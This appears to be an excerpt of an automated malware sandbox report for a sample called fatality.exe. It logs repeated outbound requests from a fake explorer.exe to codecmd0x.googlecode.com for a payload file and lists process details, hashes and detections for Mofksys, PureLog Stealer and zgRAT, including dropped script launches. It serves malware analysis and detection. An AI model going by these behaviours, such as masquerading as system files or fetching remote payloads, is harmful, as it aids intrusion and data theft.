69 | 192.168.2.4 | 56861 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:57.728806019 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: codecmd01.googlecode.com
Connection: Keep-Alive
Jan 13, 2025 13:18:58.452804089 CET | 1236 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Referrer-Policy: no-referrer
Content-Length: 1575
Date: Mon, 13 Jan 2025 12:18:58 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:58.452830076 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 56862 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:58.828869104 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:18:59.562171936 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:59 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:18:59.562197924 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 56863 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:18:59.908731937 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:19:00.575400114 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:00 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:19:00.575424910 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 56864 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:19:00.927939892 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:19:01.652694941 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:01 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:19:01.652767897 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 56865 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:19:02.094438076 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:19:02.919459105 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:02 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:19:02.919480085 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 56866 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:19:03.234020948 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
Jan 13, 2025 13:19:03.967974901 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:19:03 GMT
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Jan 13, 2025 13:19:03.967992067 CET | 494 | IN
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 56867 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:19:04.645541906 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd01.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:19:05.383765936 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:19:05 GMT
Jan 13, 2025 13:19:05.383789062 CET | 494 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 56868 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:19:05.749891996 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd02.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:19:06.474775076 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:19:06 GMT
Jan 13, 2025 13:19:06.475022078 CET | 494 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 56869 | 64.233.167.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:19:07.424693108 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd03.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:19:08.087565899 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:19:08 GMT
Jan 13, 2025 13:19:08.087589979 CET | 494 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 56870 | 66.102.1.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:19:08.430860043 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd01.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:19:09.142765045 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:19:09 GMT
Jan 13, 2025 13:19:09.142785072 CET | 494 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 56871 | 74.125.133.82 | 80 | 7540 | C:\Windows\Resources\Themes\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:19:09.582691908 CET | 215 | OUT | GET /files/tjcm.gif HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: codecmd02.googlecode.com
    Connection: Keep-Alive
Jan 13, 2025 13:19:10.295950890 CET | 1236 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html; charset=UTF-8
    Referrer-Policy: no-referrer
    Content-Length: 1575
    Date: Mon, 13 Jan 2025 12:19:10 GMT
Jan 13, 2025 13:19:10.295970917 CET | 494 | IN



                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:07:17:03
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\fatality.exe"
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:3'457'619 bytes
                                                                                                                                                          MD5 hash:C883EA559BEE9A0CB393AA32DCAF5D80
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000000.1681547764.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:1
                                                                                                                                                          Start time:07:17:03
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\users\user\desktop\fatality.exe
                                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                                          File size:3'319'076 bytes
                                                                                                                                                          MD5 hash:A7040B85FC683F088F4C6E5B44052C43
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1705089952.00000000056A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000003.1704006119.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Desktop\fatality.exe , Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Desktop\fatality.exe , Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          • Detection: 71%, ReversingLabs
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:07:17:04
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'518 bytes
                                                                                                                                                          MD5 hash:D36CC2935AE0E7A5D2936DB589A9B8CC
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000002.00000002.1733234738.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000002.00000000.1692168496.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:07:17:05
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\windows\resources\themes\explorer.exe
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'366 bytes
                                                                                                                                                          MD5 hash:7E24D6E5185E961528CFBCC6840EBBE9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000000.1705891813.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000002.2940200306.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:07:17:06
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\windows\resources\spoolsv.exe SE
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'480 bytes
                                                                                                                                                          MD5 hash:DA56FBDFF5925EFBA1E9942139E2A354
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000004.00000002.1726064451.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000004.00000000.1712734504.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:07:17:06
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\svchost.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\windows\resources\svchost.exe
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'449 bytes
                                                                                                                                                          MD5 hash:5020DD008EA5092AFC4BBD7961322484
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000000.1714385550.0000000000401000.00000080.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:07:17:06
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                                                                                                                                          Imagebase:0xd00000
                                                                                                                                                          File size:147'456 bytes
                                                                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:7
                                                                                                                                                          Start time:07:17:07
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:c:\windows\resources\spoolsv.exe PR
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'480 bytes
                                                                                                                                                          MD5 hash:DA56FBDFF5925EFBA1E9942139E2A354
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000007.00000000.1722308050.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000007.00000002.1726017158.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:8
                                                                                                                                                          Start time:07:17:16
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:138'366 bytes
                                                                                                                                                          MD5 hash:7E24D6E5185E961528CFBCC6840EBBE9
                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000000.1815639732.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:10
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:false

                                                                                                                                                          Target ID:11
                                                                                                                                                          Start time:07:17:17
                                                                                                                                                          Start date:13/01/2025
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
